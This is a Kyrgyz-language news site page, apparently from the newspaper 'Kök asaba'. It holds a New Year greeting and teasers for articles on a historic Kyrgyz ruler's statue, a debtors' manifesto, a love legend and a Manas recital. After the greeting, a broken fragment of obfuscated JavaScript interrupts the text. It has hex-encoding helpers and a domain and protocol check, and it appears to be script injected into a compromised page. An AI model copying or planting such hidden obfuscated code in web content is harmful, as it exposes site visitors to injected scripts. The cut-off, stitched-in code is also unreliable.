Dec 27

Мечин жылы – мээримдүүлүктүн жылы болсун!

Асылдыкты тутунган ардактуу ак калпак кыргыз эли, урматтуу окурмандар!

novogodnye_oboi_dlya_rabochego_stola_2016-3

Кадырлашуу – касиеттүүнүн, сыйлашуу – сыймыктуунун иши. Келечегибизге карай түздөнүп, кезибизди туура жашап өтүү учурдун талабы азыр.

Жаңырып келген Мечин жылыбыз мээримдүүлүктүн жана жандуулуктун жылы болсун!

Жашоонун негизин тааныган, өзөгүн өстүргөн, аң-сезими бийик адамдардын катары артсын. Иш баштасак ак, аткарылышы так, байышы изги болсун. Пейилибиз кең, кең пейилдүүлөр тең болсун. Тутунганыбыз туруктуулук, тумарыбыз эл-журтубуз болсун. Саныбыз сак, жаныбыз соо болсун. Жакшылыктын илеби, жаратмандыктын толкуну жүрсүн. Жерибиз нурга бөлөнүп, элибиз мээримге балкысын!

Оюбуз ойгоо болсун. Көрүүбүз кенен, акылыбыз терең, билгенибиз бийик болсун. Коомубуз нарктуу, жолубуз көрктүү, көкүрөктөр демдүү, жалгыздар элдүү, жашообуз шаңдуу, кампабыз дандуу болсун. Татканыбыз таза, ичкенибиз тунук болсун!

Ааламыбыздын шайкештиги сакталып, ар бирибизде ырааттуулук, иреттүүлүк өкүм сүрсүн. Аруулук орногон элибиздин ажары ачылып, жылдызы жансын! Улуктарга жол болсун! Өнөрлүүлөр өсүп, эл-жерибиздин даңкын чыгарсын, жердештерибиздин жеңиши көп болуп, элибиз жүзү жаркып, ар-намысы артсын. Очогубуздун оту өчпөй, түндүгүбүздөн жарык нур жаап, кут куюлуп турсун. Кел-келибиз келгенде күтүнөөр элибиз камдуу болсун. Жүрөгүбүзгө орногон сүйүү -күйүмдүүлүк, камкордук, жоопкерчилик жана чындык аркылуу чагылып чыгып, мамилелерди жылытсын!

Дүйнөдө тынчтык болсун! Жаратканыбыз ырысы менен берекесин мол берсин, карманаар деңгээлди кошо берсин. Жан дүйнөбүз байып, изденүүбүз бийиктеп, кубанычыбыз зор болсун! Жаңы жылыбыз куттуу болсун!

Сиздерди терең урматтап, “Көк асаба” гезитинин жамааты!

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kok-asaba.journalist.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Dec 27

Кытайдан табылган кыргыз ажосунун айкели

Рисунок1

Макелек Өмүрбай кыргыз ажосунун айкелинин жанында

Кытай Эл Республикасынын жараны, «Тил жана Котормо» журналынын башкы редактору, филология илимдеринин доктору, окумуштуу КАРМЫШТЕГИН МАКЕЛЕК ӨМҮРБАЙ уулу көптөгөн эмгектери менен бирге кыргыздын тарыхын, байыркы кыргыз бийлигин, кыргыз мамлекеттүүлүгүн тынбай изилдеп келет.

Кытай жазмаларынын ишенимдүү булактарына таянуу менен, Кыргыз кагандарынын ысымдарын жана алар тууралуу маалыматтарды Макелек Өмүрбай мындан бир жылдай мурун жазып чыгып, башка гезит беттерине жарыялаган. Кагандар боюнча толуктоо маалыматтары азыркы макаланын этегинде берилип, ал эми өзөгүндө окумуштуунун кыргыздын VIII кылымдагы ажосу Жетисан Бекбай Багачордун Кытайдын Шаншы (Шаньси) провинциясынан табылган айкели, ал тууралуу маалымат жана андагы 61 айкел тууралуу изилдеп-иликтеген ойлору камтылды.

Макаланын сѳз курамынын жазылышын автор ѳзү кандай жазса, ошол бойдон бузбай берүүгѳ аракет кылдык. Кайнарбек Бийлибаев Continue reading

Dec 26

Кыргызстандагы насыя алуучулардын укугун коргоо элдик кыймылынын манифести

5-ЧороевКубан  ЧОРОЕВ, манифесттин автору

Белчесинен карызга баткан кыргыз,

Үйлѳрүнѳн ажырап калган кыргыз.

Ѳлсѳ дагы карызын балдарына,

 Арман кылып мураска берген кыргыз.

Мына ушундай заманды кыргыз башынан кечирип отурган учур келди. Жүз миңдеген жарандарыбыз тирүү жүрүп алган насыяларын тѳлѳй албай, тозоктун азабын чегип жүрүшѳт. Алардын жашоодогу үмүтү ѳчүп, айласын таппай турган учуру. Мурун айыл жерлеринде жумушсуздуктан, кирешелеринин аздыгынан жана айыл чарба продукциясынын баасынын кескин тѳмѳндѳп кетишинен ѳз насыяларын тѳлѳѳдѳн кыйналып жүрүшсѳ, азыркы күндѳрү сода-сатыктын кескин токтоп калышынан базарларда иштеген миңдеген ишкер жарандарыбыз насыяларын тѳлѳй албай кыйын абалда калып олтурат. Continue reading

Dec 24

Cүйүү баяны

Уламыш

Кутман БОРОНЧУ

Кайсыл бир өткөн замандарда, жүзүнөн күндүн нуру төгүлгөн, асмандагы ай нурундай көрүнгөн Аруунай деген сулуу кыз жашап өткөн экен.

13-2

Аруунайдын сулуулугу бул ааламда айтса сөздүн күчү жетпеген, көрсө көздүн кумары канбаган, ажары ай-ааламды суктандырган керемет нурга бөлөнгөн адам кейпин кийип түшкөн асмандагы периштенин кызындай көрүнчү экен. Кыздын ата-энеси кадимки Ысык-Көлдүн жээгиндеги Көк-Жайлак деген жерде жашаган.

Колунан көрү төгүлгөн узчулугу Аруунай сулуунун атагын алыска, учугун узун элге жеткирет. Кыскасы, кыздын секелек курагынан тартып эле ата-энесинин үйүнөн жуучулар үзүлбөйт. Убакыт зымырап куштай учуп өтүп, Аруунайдын жашы он үчкө чыгып келет. Эмнегедир бой тартып чоңое баштагандан бери кыздын көңүлүнө эч нерсе жакпай, жалгыздыкты гана самай баштайт. Continue reading

Dec 15

Талантаалы БАКЧИЕВ, манасчы: “Манасты” – билим, күч-кубат, дем-кайрат алуу максатында угушкан”

Манас – чексиз ойдун ченемсиз күчү

Ордо калаабыздагы “Дасмия” этнокомплексинде 7 күн, 7 түн “Манас” үчилтигин айтуу иш-чарасы 27-ноябрда саат 14.30да салтанаттуу башталып, 4-декабрда саат 14.30да салтанаттуу аяктады.

Иш-чаранын жабылышында “Саякбай манасчы” Эл аралык коомдук фондусу иш-чарага катышкан манасчынын ар бирине 15 миң сомдон акчалай сыйлык жана компьютер тапшырды. 

12349609_943475835726821_964695196_o

4-декабрда, КРнын Өкмөт Башчысы Темир Сариевдин  катышуусу менен саат 10.00дө Бишкектеги “Манас айылы” этнокомплексинде Саякбай Каралаевдин айкелинин ачылышы, ошол эле күнү саат 11.00дө А.Малдыбаев атындагы Опера жана балет театрында салтанаттуу жыйын өткөрүлдү. Бул салтанаттуу жыйында манасчылар: Талантаалы Бакчиевди, Рысбай Исаковду, Улан Исмаиловду КРнын Өкмөтүнүн аталышы жазылган атайын алтын саат менен Темир Сариев сыйлады.

“Манаска” байланышкан иш-чаралардын жүрүшүн Кыргызстандагы ММКнын дээрлик бардыгы чагылдырып жатышты. Ал эми жети күндүктүн кандай өткөнү жана бул иш-чаранын негизи тууралуу маалымат алууну көздөп, манасчы, Манастаануучулардын эл аралык ассоциациясынын Президенти, филология илимдеринин кандидаты, доцент Талантаалы Бакчиевди маекке тарттык. Continue reading